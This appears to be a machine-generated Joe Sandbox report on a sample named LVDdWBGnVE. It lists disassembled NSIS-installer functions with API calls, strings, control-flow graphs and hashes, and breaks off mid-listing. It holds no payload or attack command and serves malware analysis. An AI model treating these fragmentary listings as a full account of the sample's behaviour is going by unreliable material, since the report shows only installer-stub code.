                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                • API String ID: 2435955865-3712954417
                                                • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: jF
                                                • API String ID: 2295610775-3349280890
                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                APIs
                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                • ShowWindow.USER32(?), ref: 00401753
                                                • ShowWindow.USER32(?), ref: 00401767
                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                Strings
                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                • Sleep(%d), xrefs: 0040169D
                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                • SetFileAttributes failed., xrefs: 004017A1
                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                • Aborting: "%s", xrefs: 0040161D
                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                • detailprint: %s, xrefs: 00401679
                                                • BringToFront, xrefs: 004016BD
                                                • Call: %d, xrefs: 0040165A
                                                • Rename: %s, xrefs: 004018F8
                                                • Jump: %d, xrefs: 00401602
                                                • Rename failed: %s, xrefs: 0040194B
                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                • Rename on reboot: %s, xrefs: 00401943
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                • API String ID: 2872004960-3619442763
                                                • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                • ShowWindow.USER32(?), ref: 004054FE
                                                • DestroyWindow.USER32 ref: 00405512
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                • GetDlgItem.USER32(?,?), ref: 0040554F
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 3282139019-0
                                                • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                APIs
                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                • API String ID: 608394941-2746725676
                                                • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427576,762323A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
